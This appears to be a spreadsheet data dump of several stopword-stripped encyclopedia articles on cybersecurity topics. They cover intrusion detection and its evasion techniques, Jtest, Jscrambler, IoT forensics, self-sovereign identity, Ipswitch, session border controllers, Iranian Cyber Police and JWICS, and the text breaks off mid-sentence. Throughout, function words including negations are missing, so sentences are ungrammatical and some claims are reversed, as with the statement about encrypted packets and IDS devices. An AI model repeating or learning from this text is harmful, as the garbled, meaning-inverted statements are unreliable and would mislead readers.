breaches shown reduces amount false positives. position also assists decreasing amount time takes discover successful attacks network.sometimes advanced features integrated firewall order able intercept sophisticated attacks entering network. examples advanced features would include multiple security contexts routing level bridging mode. turn potentially reduces cost operational complexity.another option placement within actual network. these reveal attacks suspicious activity within network. ignoring security within network cause many problems, either allow users bring security risks allow attacker already broken network roam around freely. intense intranet security makes difficult even hackers within network maneuver around escalate privileges. limitations noise severely limit intrusion detection system's effectiveness. packets generated software bugs, corrupt data, local packets escaped create significantly high false-alarm rate. uncommon number real attacks number false-alarms. number real attacks often number false-alarms real attacks often missed ignored. many attacks geared specific versions software usually outdated. constantly changing library signatures needed mitigate threats. outdated signature databases leave vulnerable newer strategies. signature-based ids, threat discovery signature applied ids. during time, unable identify threat. cannot compensate weak identification authentication mechanisms weaknesses network protocols. when attacker gains access weak authentication mechanisms cannot prevent adversary malpractice. encrypted packets processed intrusion detection devices. therefore, encrypted packet allow intrusion network undiscovered significant network intrusions occurred. intrusion detection software provides information based network address associated packet sent network. this beneficial network address contained packet accurate. however, address contained packet could faked scrambled. nature nids systems, need analyse protocols captured, nids systems susceptible protocol-based attacks network hosts vulnerable. invalid data tcp/ip stack attacks cause nids crash. security measures cloud computing consider variation user’s privacy needs. they provide security mechanism users matter users companies individual person. evasion techniques there number techniques attackers using, following considered 'simple' measures taken evade ids: fragmentation: sending fragmented packets, attacker radar easily bypass detection system's ability detect attack signature. avoiding defaults: port utilised protocol always provide indication protocol transported. example, expect detect trojan port 12345. attacker reconfigured different port, able detect presence trojan. coordinated, low-bandwidth attacks: coordinating scan among numerous attackers agents) allocating different ports hosts different attackers makes difficult correlate captured packets deduce network scan progress. address spoofing/proxying: attackers increase difficulty security administrators ability determine source attack using poorly secured incorrectly configured proxy servers bounce attack. source spoofed bounced server, makes difficult detect origin attack. pattern change evasion: generally rely 'pattern matching' detect attack. changing data used attack slightly, possible evade detection. example, internet message access protocol (imap) server vulnerable buffer overflow, able detect attack signature common attack tools. modifying payload sent tool, resemble data expects, possible evade detection. development earliest preliminary concept delineated 1980 james anderson national security agency consisted tools intended help administrators review audit trails. user access logs, file access logs, system event logs examples audit trails. fred cohen noted 1987 impossible detect intrusion every case, resources needed detect intrusions grow amount usage.dorothy denning, assisted peter neumann, published model 1986 formed basis many systems today. model used statistics anomaly detection, resulted early international named intrusion detection expert system (ides), workstations could consider user network level data. ides dual approach rule-based expert system detect known types intrusions plus statistical anomaly detection component based profiles users, host systems, target systems. author "ides: intelligent system detecting intruders," teresa lunt, proposed adding artificial neural network third component. said three components could report resolver. followed ides 1993 next-generation intrusion detection expert system (nides).the multics intrusion detection alerting system (midas), expert system using p-best lisp, developed 1988 based work denning neumann. haystack also developed year using statistics reduce audit trails.in 1986 national security agency started research transfer program rebecca bace. bace later published seminal text subject, intrusion detection, 2000.wisdom sense (w&amp;s) statistics-based anomaly detector developed 1989 alamos national laboratory. created rules based statistical analysis, used rules anomaly detection. 1990, time-based inductive machine (tim) anomaly detection using inductive learning sequential user patterns common lisp 3500 computer. network security monitor (nsm) performed masking access matrices anomaly detection sun-3/50 workstation. information security officer's assistant (isoa) 1990 prototype considered variety strategies including statistics, profile checker, expert system. computerwatch at&amp;t bell labs used statistics rules audit data reduction intrusion detection.then, 1991, researchers university california, davis created prototype distributed intrusion detection system (dids), also expert system. network anomaly detection intrusion reporter (nadir), also 1991, prototype developed alamos national laboratory's integrated computing network (icn), heavily influenced work denning lunt. nadir used statistics-based anomaly detector expert system. lawrence berkeley national laboratory announced 1998, used rule language packet analysis libpcap data. network flight recorder (nfr) 1999 also used libpcap.ape developed packet sniffer, also using libpcap, november, 1998, renamed snort month later. snort since become world's largest used ids/ips system 300,000 active users. monitor local systems, remote capture points using tzsp protocol. audit data analysis mining (adam) 2001 used tcpdump build profiles rules classifications. 2003, yongguang zhang wenke argue importance networks mobile nodes.in 2015, viegas colleagues proposed anomaly-based intrusion detection engine, aiming system-on-chip (soc) applications internet things (iot), instance. proposal applies machine learning anomaly detection, providing energy-efficiency decision tree, naive-bayes, k-nearest neighbors classifiers implementation atom hardware-friendly implementation fpga. literature, first work implement classifier equivalently software hardware measures energy consumption both. additionally, first time measured energy consumption extracting features used make network packet classification, implemented software hardware. also application protocol-based intrusion detection system (apids) artificial immune system bypass switch denial-of-service attack analytics intrusion detection message exchange format protocol-based intrusion detection system (pids) real-time adaptive security security management shieldsup software-defined protection references this article incorporates public domain material national institute standards technology document: karen scarfone, peter mell. "guide intrusion detection prevention systems, sp800-94" (pdf). retrieved january 2010. further reading bace, rebecca gurley (2000). intrusion detection. indianapolis, macmillan technical. isbn 978-1578701858. bezroukov, nikolai december 2008). "architectural issues intrusion detection infrastructure large enterprises (revision 0.82)". softpanorama. retrieved july 2010. p.m. mafra j.s. fraga a.o. santin (2014). "algorithms distributed manets". journal computer system sciences. (3): 554–570. doi:10.1016/j.jcss.2013.06.011. hansen, james benjamin lowry, paul; meservy, rayman; mcdonald, (2007). "genetic programming prevention cyberterrorism dynamic evolving intrusion detection". decision support systems (dss). (4): 1362–1374. doi:10.1016/j.dss.2006.04.004. ssrn 877981. scarfone, karen; mell, peter (february 2007). "guide intrusion detection prevention systems (idps)" (pdf). computer security resource center (800–94). archived original (pdf) june 2010. retrieved january 2010. singh, abhishek. "evasions intrusion prevention detection systems". virus bulletin. retrieved april 2010. dubey, abhinav. "implementation network intrusion detection system using deep learning". medium. retrieved april 2021. external links intrusion detection systems curlie common vulnerabilities exposures (cve) product nist 800-83, guide malware incident prevention handling nist 800-94, guide intrusion detection prevention systems (idps) study gartner "magic quadrant network intrusion prevention system appliances"</t>
  </si>
  <si>
    <t>Jtest</t>
  </si>
  <si>
    <t>jtest automated java software testing static analysis product developed parasoft. product includes technology data-flow analysis, unit test-case generation execution, static analysis, regression testing, code coverage, runtime error detection. jtest used companies cisco systems, transcore, united guaranty, wipro technologies. also used lockheed martin f-35 joint strike fighter program (jsf). awards jtest 19th dr.dobb's jolt product excellence productivity awards security tool category part parasoft's application security solution). previously, jtest granted codie award software information industry association (siia) "best software testing solution" 2007 2005. also "technology year" award "best application test tool" infoworld years 2006 2007. jtest first received jolt award excellence 2000. also automated testing list unit testing frameworks list tools static code analysis regression testing software testing system testing test case test-driven development xunit, family unit testing frameworks references external links jtest page</t>
  </si>
  <si>
    <t>Jscrambler</t>
  </si>
  <si>
    <t>jscrambler technology company chiefly known javascript obfuscator monitoring framework name. obfuscator makes harder reverse engineer application's client-side code tamper integrity. real-time detection skimming, tampering user interface changes, monitoring framework used. jscrambler's products used number sectors including finance, broadcasting online gaming. history early days founding jscrambler started auditmark, founded 2009 pedro fortuna ribeiro. company's initial focus developing solution fight click-fraud advertising campaigns, since traffic audit mechanism javascript dependent. name flagship product jscrambler also became name company, officially founded 2014. investment september 2021, jscrambler raised total us$18.1 million funding rounds: seed 2014, jscrambler raised us$800,000 portugal ventures, public firm. seed extension march 2018, jscrambler raised us$2.3 million round sonae co-investment portugal ventures. series september 2021, jscrambler raised us$15 million round capital partners, participation sonae portugal ventures. industry recognition 2019, jscrambler recognized deloitte technology fast ranking emea's fastest-growing tech companies. jscrambler also recognized gartner’s 2019 market guide in-app protection, 2020 market guide online fraud detection, 2020 hype cycle endpoint security, 2021 hype cycle application security. media awards 2013 eurocloud best cloud startup award best solutions keeping javascript clean secure tech wire asia staying safe while accessing online banking infosecurity magazine references</t>
  </si>
  <si>
    <t>IoT Forensics</t>
  </si>
  <si>
    <t>forensics branch digital forensics goal identifying extracting digital information devices belonging internet things field, using forensically sound legally acceptable process. overview differently traditional digital forensics approaches, forensics characterized wider range potential source evidence: respect traditional analysis servers, computers smartphones, forensics processes extract information smart environment data including monitoring systems, traffic lights, medical implants, smart home devices scenarios. moreover, forensics potential source evidence different nature respect digital forensics common cases: network traffic, cloud data, devices logs information extracted used source evidence extracted successfully processed correct way. forensics identified combination three separate digital forensics schemes: device level forensics: process extracting evidence devices (i.e. device memory). devices included process: examples sensors, health implants, smart meters, smart home appliances, smart cameras, networked vehicles, rfids, drones. being devices different hardware functionalities, device level evidence identification acquisition often challenging always feasible. network forensics: process identifying extracting evidence network log, devices traffic traces communication patterns. with respect traditional network investigations, network forensics branch includes additional network models example body area network personal area network (i.e. bluetooth zigbee devices). type network, needs appropriate forensic methods investigations, involving different tools appropriate network protocol analysis. cloud forensics: process extrapolating information cloud used devices. since devices usually limited memory, information stored proprietary cloud applications contain massive amount potential evidences (i.e. devices activities). given amount information recovered different entities involved cloud, cloud forensics plays important role forensics domain: system logs, access logs, chat logs, sessions, cookies, user authentication application data examples information retrieved cloud services related device. forensics process forensics investigation process conducted using standard guidelines collected evidence admissible court. process analogous digital forensics process, faces challenges caused peculiarities devices. full process split temporally different phases: evidence identification, evidence collection, evidence preservation, evidence analysis, attack deficit attribution, evidence presentation. each different phases forensic process introduce several challenges applied limitations devices. evidence identification collection evidence identification subsequent collection first phases investigators forensic processes. search seizure important step forensic examination: particular case forensics, detecting presence systems always immediate considering devices usually small dimensions designed work passively autonomously.most information devices usually sent cloud servers, considering limited physical memory device itself. this brings challenges forensic investigators sometimes even know data located, distributed among many servers multiple data centers. moreover, identification step, cloud evidence collection always feasible given different jurisdictions data could located. data center locations cloud service providers usually distributed order reduce costs increase service efficiency. reason forensic investigator often faces multi-jurisdiction issues data collection information stored cloud.in case network forensics evidence collected network devices like routers firewalls, network potential sources evidence exists flight. example, network traffic captured time passes device processing there devices procedures storing network traffic data impractical capture save network data volume. question privacy legal issues data acquisition network forensics even larger cloud forensics case, network data might include information related legal case question. current research network forensics working development tools based popular network traffic softwares (e.g. tcpdump, wireshark) extract information network devices (i.e. wi-fi access points), order avoid storage full traffic still maintaining potential evidence forensic investigation.at device level, device question identified, evidence extracted physical memory. digital forensics traditional process guidelines suggest turn evidentiary devices order prevent alteration data. given cloud services almost substituting storage (rom) devices, physical information nevertheless located volatile memory like ram. creation evidence copy memory must done without powering device, goes traditional best-practices always feasible since devices limited energy capabilities. moreover, unplugged devices become unaccessible need proper reconfiguration use, hence modifying system logs information causing loss potential evidences. reasons approach follow dealing device level forensics performing live forensics data acquisition.recent research forensics presents several frameworks useful tools used forensics investigator identification collection evidences. great part existing tools however requires proactive process (i.e. installing software) thus always usable forensic investigations, unless crime occurs. evidence preservation after evidence identification subsequent collection, forensic investigator preserve gathered data guarantee integrity full process right collection final presentation.while preservation data using proper techniques (i.e. hashing) feasible traditional digital forensics, represents hard challenge needs particular attention environments. autonomous interactions different devices introduce challenges identify scope compromise boundaries crime scene.iot forensics evidence preservation requires modern distributed techniques preserve avoid corruption collected evidence. reason current research focuses applying proper blockchain solutions evidence preservation phase, store evidence distributed nodes network avoiding possible attacks integrity. evidence analysis attack attribution this phase involves analysis steps required investigators process connect collected evidences order reach outcome investigation. case evidence, volume data usually collected acquisition phase make almost impossible provide end-to-end analysis evidences. moreover, majority devices network store metadata including temporal information creation modification times. this makes even harder verify provenance ensure integrity collected data. particular case device physical memory analysis, several tools used electronically connecting devices (see memory forensics). trends current research network forensics field particular case forensics involves application artificial intelligence machine learning techniques deal massive amount data extracted devices network traffic traces.in attack deficit attribution phase, evidence collected analysed summarized lead final outcome investigation. traditional digital forensics involved source evidence usually extracted personal devices hence lead restricted number suspects. hold forensics evidence that, moreover extracted cloud, located physical servers accessed multiple users time. evidence presentation last phase forensic investigation process final presentation collected analysed evidences front jury court. forensics evidence presentation simple traditional forensic cases, particular finding proper human readable representation evidence usually abstract forms. depending legal systems could needed present collected evidence front jurors courtroom, probably restricted knowledge network/cloud forensics, based often personal experience devices. this introduces challenges investigator organizing evidences order produce evidence report easily understandable experts. investigator moreover particular attention processing phase, especially using analytic functions, procedure could modify structure data alter meaning, hence invalidating full process. forensics security forensics confused security. forensics takes care finding evidences forensics purposes: evidences always related devices attacks security, used proving/disproving traditional forensic crime (i.e. person detected room devices evidence). side, security takes care risks related presence devices attacks target them: protects devices external attacks prevents devices perform attacks entities. also digital forensics digital evidence memory forensics references</t>
  </si>
  <si>
    <t>Self-sovereign identity</t>
  </si>
  <si>
    <t>self-sovereign identity (ssi) approach digital identity gives individuals control information prove websites, services, applications across web. individuals persistent accounts (identities) across internet, rely number large identity providers, facebook (facebook connect) google (google sign-in), control information associated identity. user chooses large identity provider create accounts individual service provider, fragments experiences. alternatively, self-sovereign identity system, user exists independently services, enables access services streamlined secure manner maintaining control information associated identity. background tcp/ip protocol provides identifiers machines, people organisations operating machines. this makes network-level identifiers internet hard trust rely information communication number reasons: hackers easily change computer’s hardware address, services provide identifiers user, network. absence reliable identifiers primary sources cybercrime, fraud, threats privacy internet.with advent blockchain technology, model decentralized identity emerged 2015. fido alliance proposed identity model longer account-based, identified people direct, private, peer-to-peer connections secured public/private cryptography. self-sovereign identity (ssi) summarises components decentralized identity model: digital wallets, digital credentials, digital connections. technical aspects addresses difficulty establishing trust interaction. order trusted, party interaction present credentials parties, relying parties verify credentials came issuer trust. way, verifier's trust issuer transferred credential holder. this basic structure three participants sometimes called "the trust triangle".it generally recognized identity system self-sovereign, users control verifiable credentials hold consent required credentials. this reduces unintended sharing users' personal data. this contrasted centralized identity paradigm identity provided outside entity.in system, holders generate control unique identifiers called decentralized identifiers. most systems decentralized, credentials managed using crypto wallets verified using public-key cryptography anchored distributed ledger. credentials contain data issuer's database, social media account, history transactions e-commerce site, attestation friends colleagues. national digital identity systems european union european union exploring decentralized digital identity number initiatives including international association trusted blockchain application (inatba) blockchain observatory forum european framework. recently created eidas compatible european self-sovereign identity framework (essif). essif makes decentralized identifiers (dids) european blockchain services infrastructure (ebsi). korea korean government created public/private consortia specifically decentralized identity. references also decentralized identifier decentralized digital self-determination</t>
  </si>
  <si>
    <t>Ipswitch, Inc.</t>
  </si>
  <si>
    <t>ipswitch management software developer small medium sized businesses. company founded 1991 headquartered burlington, massachusetts operations atlanta (alpharetta) augusta, georgia, american fork, utah, madison, wisconsin galway, ireland. ipswitch sells products directly, well distributors, resellers oems united states, canada, latin america, europe pacific rim. since 2019, ipswitch part progress software. history roger greene founded ipswitch 1991 apartment without venture capital funding bank financing. company became profitable second year. first product ipswitch produced gateway allowed novell inc. networking protocol connect internet protocol. 1994, ipswitch launched imail server, first product available e-commerce site, open market. mid-1990s, company value-added reseller spyglass mosaic browser. 1996, company released beta version whatsup gold, commercial version earlier shareware product, ws_ping, well purchasing rights ws_ftp. 2008, ipswitch acquired wisconsin-based software producer standard networks inc. product moveit. shortly acquisition, ipswitch split operations three divisions, secure file transfers, network management, messaging collaboration. company acquired salt lake city-based hourglass technologies 2009. following year, company acquired compliance system system analysis software producer, dorian software. december 2012, ipswitch acquired waldorf, germany-based performance testing company iopus known product, imacros, web-browser extension. 2015, ipswitch merged network monitoring file transfer divisions created partnersynergy program. ipswitch opened support operations center galway, ireland march 2016. march 2019, ipswitch signed agreement progress software corporation, whereby progress acquire ipswitch. completion purchase $225 million announced progress 2019. philanthropy company commits percent profits variety community investment programs, designed support interests employees. 2010, ipswitch inc.’s network management division claimed company achieved 5,000 downloads whatsup gold engineer’s toolkit first month release. through partnership trees life international, planted 5,000 trees, download. also list standard networks products, standard networks acquired ipswitch 2008 references</t>
  </si>
  <si>
    <t>Session border controller</t>
  </si>
  <si>
    <t>session border controller (sbc) network element deployed protect based voice internet protocol (voip) networks. early deployments sbcs focused borders service provider networks peering environment. this role expanded include significant deployments service provider's access network backbone network provide service residential and/or enterprise customers.the term "session" refers communication parties context telephony, would call. each call consists call signaling message exchanges control call, call media streams carry call's audio, video, data along information call statistics quality. together, streams make session. session border controller exert influence data flows sessions. term "border" refers point demarcation part network another. simple example, edge corporate network, firewall demarcates local network (inside corporation) rest internet (outside corporation). complex example large corporation different departments security needs location perhaps kind data. case, filtering routers network elements used control flow data streams. session border controller assist policy administrators managing flow session data across borders. term "controller" refers influence session border controllers data streams comprise sessions, traverse borders part network another. additionally, session border controllers often provide measurement, access control, data conversion facilities calls control. functions sbcs commonly maintain full session state offer following functions: security provide encryption signaling (via ipsec) media (srtp) capabilities. also protect network devices from: malicious attacks denial-of-service attack (dos) distributed toll fraud rogue media streams malformed packets attempts denylisted addresses, unapproved clients, phone numbers history spamming connectivity allow different parts network communicate variety techniques traversal normalization message header manipulation ipv4 ipv6 interworking connectivity protocol translations sip, sip-i, h.323 quality service policy network prioritization flows usually implemented sbc. include functions traffic policing resource allocation rate limiting call admission control tos/dscp setting regulatory many times expected provide support regulatory requirements emergency calls prioritization ofac listed specially designated nationals lawful interception media services many generation sbcs also provide built-in digital signal processors (dsps) enable offer border-based media control services dtmf relay interworking media transcoding tones announcements data interworking support voice video calls statistics billing information since sessions pass edge network pass sbc, natural point gather statistics usage-based information sessions.with advent webrtc sbcs also assumed role webrtc gateway translate sip. while signalling protocol mandated webrtc specifications, websockets (rfc 7118) often used partially applicability envisaged communication scenarios well availability open source software jssip. case acts gateway webrtc applications points. applications sbcs inserted signaling and/or media paths calling called parties voip call, predominantly using session initiation protocol (sip), h.323, mgcp call-signaling protocols. many cases hides network topology protects service provider enterprise packet networks. terminates inbound call initiates second call destination party. technical terms, used protocol, defines back-to-back user agent (b2bua). effect behavior signaling traffic, also media traffic (voice, video) controlled sbc. cases capability provide media services, sbcs also able redirect media traffic different element elsewhere network, recording, generation music-on-hold, media-related purposes. conversely, without sbc, media traffic travels directly endpoints, without in-network call signaling elements control path. cases, simply modifies stream call control (signaling) data involved call, perhaps limiting kinds calls conducted, changing codec choices, ultimately, sbcs allow network operators manage calls made networks, change protocols protocol syntax achieve interoperability, also overcome problems firewalls network address translators (nats) present voip calls. show operation sbc, compare simple call establishment sequence call establishment sequence sbc. simplest session establishment sequence proxy user agents proxy’s task identify callee’s location forward request proxy also adds header address indicate path response traverse. proxy change dialog identification information present message from header, call-id cseq. proxies also alter information message bodies. note session initiation phase user agents exchange messages bodies include addresses agents expect media traffic. after successfully finishing session initiation phase user agents exchange media traffic directly without involvement proxy. sbcs designed many applications used operators enterprises achieve variety goals. even implementation might differently depending configuration case. hence, easily possible describe exact behavior would apply implementations. general possible identify certain features common sbcs. example, sbcs implemented back-to-back user agent. b2bua proxy-like server splits transaction call legs: side facing user agent client (uac), acts server, side facing user agent server (uas) acts client. while proxy usually keeps state information related active transactions, b2buas keep state information active dialogs, e.g., calls. that proxy receives request save state information. once transaction over, e.g., receiving response, state information soon deleted. b2bua maintain state information active calls delete information call terminated. when included call path, acts b2bua behaves user agent server towards caller user agent client towards callee. sense, actually terminates call generated caller starts call towards callee. invite message sent contains longer clear reference caller. invite sent proxy includes contact headers point caller. sbcs often also manipulate dialog identification information listed call-id from tag. further, case configured also control media traffic also changes media addressing information included lines body. thereby, messages traverse also audio video packets. invite sent establishes dialog, also manipulates message sequence number (cseq) well max-forwards value. note list header manipulations listed subset possible changes might introduce message. furthermore, sbcs might listed manipulations. expected control media traffic might need change anything body. some sbcs change dialog identification information others might even change addressing information. sbcs often used corporations along firewalls intrusion prevention systems (ips) enable voip calls protected enterprise network. voip service providers sbcs allow voip protocols private networks internet connections using nat, also implement strong security measures necessary maintain high quality service. sbcs also replace function application-level gateways. larger enterprises, sbcs also used conjunction trunks provide call control make routing/policy decisions calls routed lan/wan. there often tremendous cost savings associated routing traffic internal networks enterprise, rather routing calls traditional circuit-switched phone network. additionally, sbcs allow voip calls phones using different voip signaling protocols (e.g., sip, h.323, megaco/mgcp) well performing transcoding media stream different codecs use. most sbcs also provide firewall features voip traffic (denial service protection, call filtering, bandwidth management). protocol normalization header manipulation also commonly provided sbcs, enabling communication different vendors networks. from multimedia subsystem (ims) 3gpp (3rd generation partnership project) architecture perspective, integration p-cscf ims-alg signaling plane access gateway media plane access side. interconnect side, maps ibcf, signaling plane trgw (transition gateway) media plane. from ims/tispan architecture perspective, integration p-cscf c-bgf functions access side, ibcf, iwf, thig, i-bgf functions peering side. some sbcs "decomposed", meaning signaling functions located separate hardware platform media relay functions words p-cscf separated c-bgf, ibcf/iwf separated i-bgf functions physically. standards-based protocol, h.248 profile, used signaling platform control media sbcs proprietary protocols. controversy during infancy, concept controversial proponents end-to-end systems peer-to-peer networking because: sbcs extend length media path (the media packets network) significantly. long media path undesirable, increases delay voice packets probability packet loss. both effects deteriorate voice/video quality. however, many times obstacles communication firewalls call parties, cases sbcs offer efficient method guide media streams towards acceptable path caller callee; without call media would blocked. some sbcs detect ends call subnetwork release control media enabling flow directly clients, anti-tromboning media release. also, sbcs create media path none would otherwise allowed exist virtue various firewalls security apparatus endpoints). lastly, specific voip network models service provider owns network, sbcs actually decrease media path shortcut routing approaches. example, service provider provides trunking services several enterprises would usually allocate enterprise vpn. often desirable option interconnect sbcs. vpn-aware perform function edge network, rather sending traffic core. sbcs restrict flow information call endpoints, potentially reducing end-to-end transparency. voip phones able protocol features unless understood sbc. however, sbcs usually able cope majority new, unanticipated protocol features. sometimes end-to-end encryption can't used key, although portions information stream encrypted call encrypted, portions used influenced sbc. however, generations sbcs, armed sufficient computing capacity, able offload encryption function elements network terminating sip-tls, ipsec, and/or srtp. furthermore, sbcs actually make calls scenarios work before, performing specific protocol "normalization" "fix-up". cases, far-end hosted traversal done without sbcs voip phones support protocols like stun, turn, ice, universal plug play (upnp).most controversy surrounding sbcs pertains whether call control remain solely endpoints call service owners), rather shared network elements owned organizations managing various networks involved connecting call endpoints. example, call control remain alice (two callers), call control shared operators networks involved connecting alice bob's voip phones together. debate point vigorous, almost religious, nature. those wanted unfettered control endpoints only, also greatly frustrated various realities modern networks, firewalls filtering/throttling. side, network operators typically concerned overall network performance, interoperability quality, want ensure secure. lawful intercept calea provide session media (usually rtp) signaling (often sip) wiretap services, used providers enforce requests lawful interception network sessions. standards interception services provided atis, tia, cablelabs etsi, among others. history market according jonathan rosenberg, author 3261 (sip) numerous related rfcs, dynamicsoft developed first working conjunction aravox, product never truly gained marketshare. newport networks first london stock exchange's 2004 (nng), cisco publicly traded since 1990. acme packet followed october 2006 floating nasdaq. with field narrowed acquisition, nextone merged reefpoint becoming nextpoint, subsequently acquired 2008 genband. time, emerged “integrated” border control function integrated another edge device. 2009, ingate systems’ firewall became first earn certification icsa labs, milestone certifying voip security capabilities sbc. continuing growth voip networks pushes sbcs edge, mandating adaptation capacity complexity. voip network grows traffic volume increases, sessions passing sbc. vendors addressing scale requirements variety ways. some developed separate, load balancing systems front clusters. others, developed architectures using latest generation chipsets offering higher performance sbcs scalability using service cards. also firewall (computing) multimedia subsystem (ims) 3gpp long term evolution (lte) session initiation protocol (sip) universal mobile telecommunications system (umts) trunking references</t>
  </si>
  <si>
    <t>Iranian Cyber Police</t>
  </si>
  <si>
    <t>iranian cyber police (persian: پلیس فضای تولید تبادل اطلاعات ایران, pelis-e fezai-ye tulid-e tebadâl-e atlâ'at-e iran, lit. police sphere production exchange information also known fata (persian: فتا) unit islamic republic iran police, founded january 2011. december 2012, head tehran's cyber police unit dismissed relation death iranian blogger sattar beheshti, held cyber police's custody. inauguration 2009, iran's police chief brigadier general esmail ahmadi-moqaddam announced plans cyber police division counter "internet crimes".on january 2011, iran's cyber police (fata) unit launched brigadier general kamal hadianfar head force. inaugural ceremony, police chief esmail ahmadi-moqaddam said unit operational tehran iranian year, police stations throughout country would cyber units. according agence france-presse, ahmadi-moqaddam said "the cyber police would take anti-revolutionary dissident groups used internet-based social networks 2009 trigger protests re-election president mahmoud ahmadinejad." activities january 2012, cyber police issued guidelines internet cafés, requiring users provide personal information would kept café owners months, well record websites visited. rules also require café owners install closed-circuit television cameras maintain recordings months. cyber police stated measures implemented "citizens concerned theft information." according golnaz esfandiari radio free europe/radio liberty, however, rules "will also create logbook authorities track activists whomever deemed threat national security."the month, cyber police also arrested four administrators facebook group launched online beauty competition. cyber police chief announced group "destroyed" spreading corruption immorality.in june 2012, iranian media reported cyber police would launching crack virtual private networks (vpns), used many iranians circumvent government's internet censorship. death sattar beheshti october 2012, cyber police arrested 35-year-old sattar beheshti "actions national security social networks facebook." beheshti criticized iranian government blog. beheshti found dead prison cell november believed tortured death cyber police authorities.the death beheshti sparked international condemnation "generated rare torrent criticism officials" iran. iranian parliament member mehdi davatgari charged cyber police held beheshti illegally overnight without court order called "resignation dismissal cyber police chief." december 2012, chief tehran's cyber police unit, mohammad hassan shokrian, dismissed death beheshti "failures weaknesses adequately supervising personnel supervision." references external links official website (persian) official website (english)</t>
  </si>
  <si>
    <t>Joint Worldwide Intelligence Communications System</t>
  </si>
  <si>
    <t>joint worldwide intelligence communication system (jwics, jay-wiks) united states department defense's secure intranet system houses secret sensitive compartmented information. jwics superseded earlier dsnet2 dsnet3, secret levels defense data network based arpanet technology.the system deals primarily intelligence information networks accessed chelsea manning, leaking sensitive footage intelligence afghanistan iraq wars whistleblower organization wikileaks 2010. video used wikileaks' collateral murder diplomatic cables leaked manning.because information houses, jwics subject discussion around cybersecurity united states' vulnerability cyber threats. opinions surrounding joint worldwide intelligence communication system varied. some emphasize importance measure protect intelligence helps ensure safety military interests personnel. others scrutinize system standing transparency accountability government. jwics practice joint worldwide intelligence communications system (jwics) secure intranet system utilized united states department defense house "top secret/sensitive compartmented information" day-to-day usage, jwics used primarily members intelligence community, within dod, federal bureau investigation justice department. conversely, siprnet niprnet account overwhelming bulk usage within non-intelligence government agencies departments. there three main router networks operated department defense. each separated types information deal with.at open level, non-classified internet protocol router network (niprnet) non-classified still specialized information relating important logistics planning.above lies secret internet protocol router network (siprnet). siprnet deals classified, secret, information. siprnet another networks accessed chelsea manning (see jwics, wikileaks, chelsea manning").finally, joint worldwide intelligence communications system houses level data, consisting primarily top-secret intelligence information. system deals transmissions coming across globe. transmission information across jwics network summarized jeffrey cares encyclopedia cyber warfare: jwics utilize satellite network connections, traffic moving across network sent prioritized premarked packets, meaning important sensitive information sent fastest secure routes once transmitted, information housed jwics accessible "highly secured rooms known secret compartmentalized information facilities. such rooms incredibly important facilities, highly vulnerable compromised. jwics, wikileaks, chelsea manning vulnerability secure networks jwics insider threats revealed leak hundreds thousands secret intelligence documents, largest history time. epicenter leaks intelligence analyst early twenties named chelsea manning. manning stationed iraq 2010 accessed jwics, along lower-level counterpart siprnet, leak documents wikileaks, non-profit platform whistleblowers headed julian assange. manning directly involved leaks known "collateral murder," "the iraqi logs," "the afghan diary," "cablegate". manning allegedly responsible leaking 700,000 files. time largest data leak military history. manning arrested late 2010 confiding fellow hacker, adrian lamo, reported manning federal bureau investigation.it believed manning's decision supply files wikileaks began partly result directly experiencing "war porn", graphic videos watched analysts entertainment. notable video viewed manning would later also capture public attention involved apache helicopter firing civilians. this video would named "collateral murder." manning also uncomfortable censorship iraqi citizens published opinions government, "don't ask, tell" construct surrounding homosexuality military. information contained secure networks jwics, causing legitimacy form protection, rather censorship, widely scrutinized media academic discourse.manning sentenced 2013 years fort leavenworth. this sentence commuted obama administration release years 2017. manning jailed refusing testify grand jury investigation wikileaks, released march 2020.the events surrounding manning widespread reforms. training monitoring place identify risk factors analysts prevent using position leak documents secure networks. addition, widespread monitoring daily networks undertaken. cybersecurity concerns often discussed focus hacking external threats, mark ambidner atlantic highlighted susceptibility defense networks trusted actors: took disaffected young rudimentary knowledge computer systems bring entire edifice code names, secret networks, compartmented channels, protected information. public interest some argue pro-public interest perspective jwics allows government manipulate releases information occurred "collateral murder") shirk accountability wrongdoings.others, take conservative approach information release, cite importance protecting troops ground deny idea full transparency essential democracy. arguments with development secure intranet networks increased technology government military operations, networks jwics come scrutiny perceived capacity keep public interest information behind closed networks.at heart pro-public interest arguments desire hold governments accountable wrongdoings. academics posit pre-1991 layer separation allowing organizations selective released public. thus, advent world wide 1991 viewed triumph public interest, allowing individuals "freely share knew." since then, however, development secure networks jwics reinstated levels separation individuals government prevented public holding government account. this exacerbated since 9/11 terror providing 'scape-goat' governments hiding public interest information (such shooting iraqi journalists "collateral murder") guise protecting foreign interests terrorism.one main pro-protection arguments surrounding jwics jwics essential prevent identities individuals released. releasing documents en-masse without adequate care, leakers putting individuals risk. case military operations, jwics also said protect troops ground safeguarding strategy movements.pro-protection parties argue leaking agents wikileaks need better censor identities individuals contained leaks prevent harm.in several wikileaks' leaks involving jwics iraq afghanistan wars, worked alongside publications york times. publishing documents, times employed censorship efforts, consulting omit publication.the central counterargument protection releases must balance opposing forces public interest potential harm. pro-public interest speaker simon jenkins states "the media protect power embarrassment." nonetheless, pro-protection standpoint, media role defining limits public interest publications protect safety certain stakeholders. counterterrorism jwics operates highest level network dod's information cyberspace. controlled network, information contained within great importance parties looking information.because importance, issue surrounding jwics threat cyberterrorism. foundations like jwics present critically important assets infiltrated, lead information and/or strategic advantages. this dissimilar strategic points like bases fortresses would infiltrated regular warfare.the vulnerability cyber networks lies construction. structures created software written individuals whose mistakes create vulnerabilities want protect information, opportunities seeking addition, cyberterrorism restricted geographical bounds. networks hacked remotely across globe without warning. this creates jurisdictional issues enforcement.a vulnerability secret level networks jwics described 'sneakernet threat.' these systems designed separate unclassified internet, creating protection malware. however, systems also rely users uploading documents internet. this creates risk viruses passed along information secure system.an example threat came reality 2008 russian malware made siprnet system thumb-drive plugged classified-level computers accessing network. these computers lacked virus protection detachment internet, compromised result. virus, gaining access networks, acted 'beachhead' allowed transfer data foreign computers hack was, time, largest compromise cybersecurity history, initially thumb-drives. later repealed.jwics structured slightly differently siprnet. jwics accessed "terminals" protected facilities known secret compartmentalized information facilities. these physical facilities highly protected physical structures. this present strategic advantage. terminal accessed enemy, jwics available terminal disconnected network. because jwics' structure, allowing access secure facilities, relatively protected outside threats. however, intrinsic vulnerability jwics summarized clarke knake cyber war: next threat national security what about access terminals restricted location, information flowing network still across fiber optic cables routers servers, network. routers attacked communications. hardware used compromised point manufacture later one. therefore cannot assume even network reliable. mounting threat cybersecurity developments surrounding defense. 2011, leon panetta intelligence officials gave statements growing vulnerability cyber attacks. this stemmed pentagon reports critical 